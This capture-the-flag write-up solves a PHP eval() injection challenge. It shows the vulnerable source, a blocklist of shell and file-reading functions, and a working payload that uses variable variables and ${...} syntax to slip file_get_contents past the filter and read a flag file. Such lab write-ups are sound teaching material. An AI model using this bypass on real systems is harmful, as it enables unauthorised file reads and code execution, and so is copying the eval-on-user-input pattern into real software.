Links

Impasse

This is a PHP eval() injection challenge.
When submitting the form, the input is wrapped around an echo statement and added to the print GET parameter:
?print=echo+'<YOUR DATA>'+;
The first thing we tried was to modify the GET parameter to test for arbitrary code execution:
print=echo+'';phpinfo()
By checking the debug option, we are presented with the page's source code. The following code implements the input blacklist and the eval() vulnerability:
<?php
error_reporting(0);
if (isset($_GET['print'])) {
if (!empty($_GET['print'])){
$printValue= strtolower($_GET['print']);
$blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
$special_block= "nc";
$$special_block= "../flag.txt";
foreach ($blocked as $value) {
if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
$printValue="";
echo "<script>alert('Bad character/word ditected!');</script>";
break;
}
}
eval($printValue . ";");
}
}
?>
Many useful functions have been blocked! But note that the eval() statement is called after the $blocked, $special_block and $$special_block variables are defined. This allows us to reference these variables in our eval-ed code.
Note that $$ has a special meaning in PHP: https://stackoverflow.com/questions/4169882/what-is-in-php
$foo = 'hello';
$hello = 'The Output';
echo $$foo; // displays "The Output"
What happens here is that the value of $foo is used as a variable name, and so $$foo becomes $hello (think of it as replacing $foo in $$foo).
$special_block= "nc";
$$special_block= "../flag.txt";
Here, the value of $special_block is used as a variable name. The second line defines a new variable, $nc, which has the value of "../flag.txt".
Our final payload is
?print=echo+'';print(eval('return ${blocked}[4](${nc});'))
which leads to the following code being eval-ed:
print(eval('return file_get_contents("../flag.txt");')
Note that $[a-zA-Z] is blocked in the regex, so we must use ${...} instead (which achieves the same purpose). Also, eval() executes file_get_contents("../flag.txt") but doesn't display anything to us yet. By returning and printing the output, we retrieve the flag.